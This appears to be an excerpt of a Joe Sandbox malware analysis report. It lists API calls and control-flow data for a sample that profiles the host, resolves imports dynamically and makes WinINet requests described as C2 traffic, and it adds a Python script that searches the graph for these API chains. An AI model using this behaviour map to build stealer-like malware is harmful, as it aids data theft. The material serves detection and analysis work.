401190 -> 4178e0 GetProcessHeap HeapAlloc GetComputerNameA; 417850 GetProcessHeap HeapAlloc GetUserNameA; 4011c4 ExitProcess
4026b4 .. 4045a9: roughly 300 consecutive call sites into 4045c0 (34 API calls; its APIs are listed below), then 419c10 -> 419c20 (43 API calls) / 41a036 (8 API calls) and, through 41a6a7, repeated GetProcAddress runs at 41a0cc (x5), 41a21f (x5), 41a428 (x5), 41a4ab (x2), 41a4e5 (x2), 41a61b (x4), 41a686 (x1), 41a6a7 (x4) interleaved with blocks of 6 to 10 further API calls (41a153, 41a2a5, 41a344, 41a522)
401590 / 401670 / 41a740 / 41a7a0 / 41a8a0: lstrcpy; 41a820: lstrlenA lstrcpy; 41a920: lstrcpy lstrcpy lstrcatA; 41a9b0: 4 API calls; 41aad0: no API
415510 .. 415a52: StrCmpCA at 415643, 4156a0, 41578a, 415856, 41593f, 415a0b; Sleep at 415a16; 4151f0 (23 API calls); 4152c0 (29 API calls)
417553 GetVolumeInformationA; 4175fc GetProcessHeap HeapAlloc; 417628 wsprintfA
404899 .. 404ecb: 4047b0 -> 401030 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI; 404838 lstrlenA; 404848 InternetCrackUrlA; 40490b InternetOpenA StrCmpCA; 418b60 GetSystemTime lstrcpy lstrcpy; 404aa3 InternetConnectA; 404ad3 HttpOpenRequestA; 404de7 / 404e03 lstrlenA; 404e13 HttpSendRequestA; 404e32 InternetReadFile; 404e67 / 404ebe / 404ecb InternetCloseHandle; 409ac0 / 409b14 CryptStringToBinaryA; 409af9 LocalAlloc; 409b39 LocalFree
4117c4 StrCmpCA; 4117cf ExitProcess; 4117e7 / 41199e strtok_s; StrCmpCA at 41185d, 41187f, 4118ad, 4118cf, 4118f1, 411913, 411932, 411951, 411970
2d10005 -> 2d1092b GetPEB; 2d10e0f SetErrorMode SetErrorMode; 2d10dbb GetPEB; 2d10238 VirtualAlloc; 2d102ce VirtualProtect; 2d10439 VirtualFree; 2d104e3 / 2d105f4 LoadLibraryA
2e09a3e -> 2e0a202 CreateToolhelp32Snapshot; 2e0a21e Module32First; 2e09ed9 VirtualAlloc
2d212eb strtok_s lstrlen lstrcpy; 2d26a0a ExitProcess; 4088a4 RaiseException __CxxThrowException@8; 2d1932a ??2@YAPAXI RaiseException; 4180a5 GetProcessHeap HeapFree; 41b9b0 RtlUnwind
Call-count-only nodes: 416ab1 (902 API calls), 41cafe (219 API calls, 5 library calls), 2d1fd67 (152), 2d21c35 (110), 41ce9f (69, __amsg_exit), 2d2d106 (41, __amsg_exit), 2d215b3 (18, ctype), 4069f3 (7), 2d19b37 (7)
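The node/edge export above is the report's own control-flow data, in the token format "<node id> <address> [API names]" for blocks and "<id>-><id>" for edges. The following is an added example and is not part of the Joe Sandbox report or of the sample: a Python parser for that format that rebuilds the successor graph and checks whether an ordered API chain lies on a single path through it. It is applied to two inputs: the GetComputerNameA / GetUserNameA / ExitProcess blocks, copied verbatim from the export, and the WinINet request blocks, which are a constructed excerpt with the runs of lstrcpy string-building nodes collapsed (the three bridging edges named in the code are assumptions, everything else is from the export).

```python
import re
from collections import deque

# Token classes in the Joe Sandbox graph export: a node is "<5-digit id> <hex address> [label...]",
# an edge is "<id>-><id>", and labels such as "34 API calls" summarise a callee instead of naming it.
NODE_ID = re.compile(r"^\d{5}$")
HEX_ADDR = re.compile(r"^[0-9a-f]{6,8}$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
SUMMARY_WORD = re.compile(r"^(\d+|API|library|calls)$")

# Verbatim excerpt of the export: the GetComputerNameA / GetUserNameA check that can end in ExitProcess.
HOST_CHECK = """26134 401190 26141 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26134->26141
26136 40119e 26137 4011cc 26136->26137 26143 417850 GetProcessHeap HeapAlloc GetUserNameA
26136->26143 26139 4011b7 26139->26137 26140 4011c4 ExitProcess 26139->26140 26142 417939
26141->26142 26142->26136 26144 4178c3 26143->26144 26144->26139"""

# Constructed sample in the same format: the WinINet nodes of the export with the runs of lstrcpy
# string-building nodes collapsed. Edges 27346->27386, 27390->27462 and 27466->27391 are
# assumptions standing in for those runs; every other id, address and edge is from the export.
C2_REQUEST = """27340 40490b InternetOpenA StrCmpCA 27341 404944 27340->27341 27342 404955 27341->27342
27343 404ecb InternetCloseHandle 27341->27343 27344 404ee8 27343->27344
27547 418b60 GetSystemTime lstrcpy lstrcpy 27342->27547 27542 409ac0 CryptStringToBinaryA 27344->27542
27346 404963 27547->27346 27386 404a8d 27346->27386 27387 404aa3 InternetConnectA 27386->27387
27387->27343 27388 404ad3 HttpOpenRequestA 27387->27388 27390 404b28 27388->27390
27391 404ebe InternetCloseHandle 27388->27391 27391->27343 27462 404e03 lstrlenA 27390->27462
27557 41aad0 27462->27557 27557->27464 27464 404e13 HttpSendRequestA 27465 404e32 InternetReadFile
27464->27465 27466 404e67 InternetCloseHandle 27465->27466 27466->27391"""

HOST_EXIT_CHAIN = ["GetComputerNameA", "GetUserNameA", "ExitProcess"]
WININET_CHAIN = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                 "HttpSendRequestA", "InternetReadFile"]


def parse_graph(text):
    """Return ({node_id: {"addr", "calls"}}, {node_id: [successor ids]}) from the export text."""
    nodes, edges, cur = {}, {}, None
    toks = text.split()
    i = 0
    while i < len(toks):
        m = EDGE.match(toks[i])
        if m:
            edges.setdefault(m.group(1), []).append(m.group(2))
        elif NODE_ID.match(toks[i]) and i + 1 < len(toks) and HEX_ADDR.match(toks[i + 1]):
            cur = toks[i]
            nodes[cur] = {"addr": toks[i + 1], "calls": []}
            i += 1  # the address token belongs to this node
        elif cur is not None and not SUMMARY_WORD.match(toks[i]):
            nodes[cur]["calls"].append(toks[i])  # an API name (or tag such as ctype) in the label
        i += 1
    return nodes, edges


def shortest_path(edges, start, goal):
    """BFS over successor edges; returns the node-id path, or [] if goal is unreachable."""
    prev, q = {start: None}, deque([start])
    while q and goal not in prev:
        nid = q.popleft()
        for nxt in edges.get(nid, []):
            if nxt not in prev:
                prev[nxt] = nid
                q.append(nxt)
    if goal not in prev:
        return []
    path, n = [], goal
    while n is not None:
        path.append(n)
        n = prev[n]
    return path[::-1]


def calls_along(nodes, path):
    """API names on the nodes of `path`, in path order; ids only seen in edges contribute nothing."""
    return [c for nid in path for c in nodes.get(nid, {}).get("calls", [])]


def is_subsequence(small, big):
    it = iter(big)
    return all(x in it for x in small)


def find_chain(nodes, edges, chain):
    """Node-id path from a block calling chain[0] to one calling chain[-1] on which the
    chain appears in order, or None. Error paths (e.g. InternetCloseHandle) are tolerated
    because the check is for an ordered subsequence, not for an exact call list."""
    starts = [n for n, v in nodes.items() if chain[0] in v["calls"]]
    goals = [n for n, v in nodes.items() if chain[-1] in v["calls"]]
    for s in starts:
        for g in goals:
            path = shortest_path(edges, s, g)
            if path and is_subsequence(chain, calls_along(nodes, path)):
                return path
    return None


if __name__ == "__main__":
    for name, text, chain in (("host check", HOST_CHECK, HOST_EXIT_CHAIN),
                              ("C2 request", C2_REQUEST, WININET_CHAIN)):
        nodes, edges = parse_graph(text)
        path = find_chain(nodes, edges, chain)
        addrs = [nodes[n]["addr"] for n in path] if path else None
        print(f"{name}: chain {'found' if path else 'absent'}; blocks {addrs}")
```

The same `find_chain` call can be run over the full export with any ordered API list, for instance to confirm that the CryptStringToBinaryA node (409ac0) sits on the InternetCloseHandle branch rather than on the request path, which is what the sample above reproduces.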

Control-flow Graph

APIs
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
• GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
• RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                                                                    • strlen.MSVCRT ref: 004046F0
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                                                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                                                                    Strings
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                                                    • API String ID: 2127927946-2218711628
                                                                                    • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                                    • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                                                                    • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                                    • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocNameProcessUser
                                                                                    • String ID:
                                                                                    • API String ID: 1206570057-0
                                                                                    • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                                                    • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                                                    • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                                                    • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                                                    APIs
                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                                                    • ExitProcess.KERNEL32 ref: 0040117E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitInfoProcessSystem
                                                                                    • String ID:
                                                                                    • API String ID: 752954902-0
                                                                                    • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                                                    • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                                                    • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                                                    • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                                                                    Control-flow Graph (legend: Executed / Not Executed; graph rendering omitted: basic blocks 419c10 through 41a709, resolving imports through LoadLibraryA and repeated GetProcAddress calls)
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E02810), ref: 00419C2D
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E02750), ref: 00419C45
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35828), ref: 00419C5E
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E358A0), ref: 00419C76
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35B28), ref: 00419C8E
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35B40), ref: 00419CA7
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E05A10), ref: 00419CBF
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35BE8), ref: 00419CD7
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35BD0), ref: 00419CF0
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35BB8), ref: 00419D08
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35B58), ref: 00419D20
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E02830), ref: 00419D39
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E02950), ref: 00419D51
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E02970), ref: 00419D69
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E02610), ref: 00419D82
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35BA0), ref: 00419D9A
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35B70), ref: 00419DB2
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E05C68), ref: 00419DCB
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E02690), ref: 00419DE3
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E35B88), ref: 00419DFB
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E39320), ref: 00419E14
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E39428), ref: 00419E2C
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E39290), ref: 00419E44
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E026D0), ref: 00419E5D
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E39230), ref: 00419E75
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E39140), ref: 00419E8D
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E391B8), ref: 00419EA6
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E393C8), ref: 00419EBE
                                                                                    • GetProcAddress.KERNEL32(74DD0000,02E39410), ref: 00419ED6
